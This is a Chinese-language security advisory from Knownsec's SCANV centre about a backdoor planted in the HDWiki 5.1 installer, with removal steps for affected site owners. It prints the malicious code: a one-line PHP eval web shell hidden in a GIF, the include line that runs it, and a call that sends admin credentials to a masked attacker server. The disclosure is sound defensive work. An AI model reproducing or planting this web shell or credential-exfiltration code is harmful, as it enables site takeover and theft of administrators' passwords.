近日，知道創宇旗下SCANV網站安全中心研究人員發現HDWiki百科建站系統(kaiyuan.hudong.com)“HDWiki5.1正式版”被“駭客”人為植入惡意網站木馬(后門)代碼。

該代碼在站長用戶下載安裝HDWiki程序后，可以記錄并發送管理員密碼到“駭客”控制的服務器上，并通過該惡意代碼直接控制該站長用戶的網站系統，實現“脫庫”、“掛馬”及“非法SEO”等攻擊。

后門文件分析

經過SCANV網站安全中心研究人員分析，“駭客”在HDWiki安裝文件包里，對三個文件進行篡改，來實現“遠程執行惡意命令，記錄管理員帳號密碼”的目的。這3個文件為：

/api/uc_client/control/mail.php

/style/default/admin/open.gif

/control/admin_main.php

1、遠程執行惡意命令

通過前兩個文件的篡改，駭客可獲得“遠程執行惡意命令“權限，可以直接導致攻擊者控制網站系統。其中/style/default/admin/open.gif被植入代碼：

<?php@eval($_POST[馬賽克])?>

這是“駭客”經常使用到的一句話網站木馬代碼，惡意代碼是放在gif圖片內，直接訪問無法解析為PHP代碼執行，然后“駭客”通過篡改/api/uc_client/control/mail.php文件的第9行代碼：

@include_once(dirname(__FILE__)."/../../../style/default/admin/open.gif");

包含了這個含有后門代碼的圖片，這就使圖片中的代碼得以執行。

2、記錄管理員帳號密碼

“駭客”通過篡改文件3來實現“記錄管理員帳號密碼”的目的，被植入代碼位于/control/admin_main.php文件的第70行，代碼如下：

@file_get_contents('http://www.馬賽克.com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

實現把用戶提交的username以及password截獲等信息并發送到一個被“駭客”控制遠程的服務器。

知道創宇在第一時間通知了HDWiki官方，但截至到本文發布為止，官方沒有做出任何積極回應及防御措施。

知道創宇安全研究團隊強烈建議站長朋友，在官方清理惡意代碼之前，暫停下載安裝HDWiki百科建站系統。

對于已經安裝的站長朋友，

知道創宇已經緊急推出了診斷工具(http://www.scanv.com/tools/)進行網站體檢，確保網站安全。詳細分析及解決方案見下：

第一步：通過SCANV網站安全中心后門檢測工具：http://www.scanv.com/tools/進行確認是否受該后門影響。

第二步：手動清除惡意代碼

[1]將/api/uc_client/control/mail.php文件里刪除第9行代碼：

@include_once(dirname(__FILE__)."/../../../style/default/admin/open.gif");

復制代碼

[2]通過復制文件/style/default/open.gif覆蓋/style/default/admin/open.gif

[3]將/control/admin_main.php文件里的刪除第70行代碼：

@file_get_contents('http://www.馬賽克.com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].

'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

第三步：再次通過SCANV網站安全中心后門檢測工具：http://www.scanv.com/tools/體檢確認。

第四步：登陸網站后臺，修改管理員密碼。

[注：請務必修改管理員密碼，另外處于安全考慮，我們把“駭客”使用的代碼部分用“馬賽克”字樣替換了，請修改代碼的時候注意一下。]

關于SCANV網站安全中心及知道創宇

“SCANV網站安全中心”由知道創宇安全研究團隊驅動,專注網站安全一體化解決方案,給站長朋友們提供網站漏洞診斷、漏洞預警、被黑預警,并提供多維度的安全解決方案、專家一對一漏洞修復、一鍵云端防御等。

“知道創宇”全稱為北京知道創宇信息技術有限公司。是國內最早提出網站安全云監測及云防御的高新企業,始終致力于為客戶提供基于云技術支撐的下一代Web安全解決方案。知道創宇總部設在北京,在香港、上海、廣州、成都設有分公司,客戶及合作伙伴來自中國、美國、日本、韓國等。